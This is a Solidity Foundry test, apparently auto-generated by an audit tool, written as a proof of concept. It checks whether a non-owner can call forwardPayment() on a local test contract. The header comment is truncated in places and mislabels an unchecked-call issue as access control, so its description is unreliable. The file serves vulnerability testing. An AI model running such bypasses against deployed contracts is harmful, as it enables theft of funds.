// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #2 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      unchecked_call
 * FUNCTION:      forwardPayment
 * VULNERABILITY: ACCESS CONTROL
 * SEVERITY:      critical
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: forwardPayment() — Z3 SAT with concrete values, invariant 'no_free_money' violated. Att
 *
 * ATTACK STEPS:
 *   1. 1. Call forwardPayment() with crafted parameters
 *   2. 2. INVARIANT 'no_free_money' BROKEN: Unchecked external call in forwardPayment(). If the call fails silently, state beco
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-13 02:40
 */

import "../../unchecked_call.sol";

contract PoC_AccessControl_unchecked_call_Test is Test {
    unchecked_call public target;

    function setUp() public {
        target = new unchecked_call();
    }

    function test_access_control_bypass() public {
        console.log("=== AGL PoC: Access Control in unchecked_call.forwardPayment ===");

        address attacker = makeAddr("attacker");

        // Try calling the unprotected function as a non-owner
        vm.prank(attacker);

        // Low-level call with correct signature
        (bool success, ) = address(target).call(
            abi.encodeWithSignature("forwardPayment(address)", attacker)
        );

        if (success) {
            console.log("[CONFIRMED] Access control missing on forwardPayment!");
            console.log("  Non-owner was able to call privileged function");
        } else {
            console.log("[SAFE] Function correctly reverted for non-owner");
        }

        assertTrue(success, "Access control bypass: non-owner should succeed on unprotected function");
    }
}
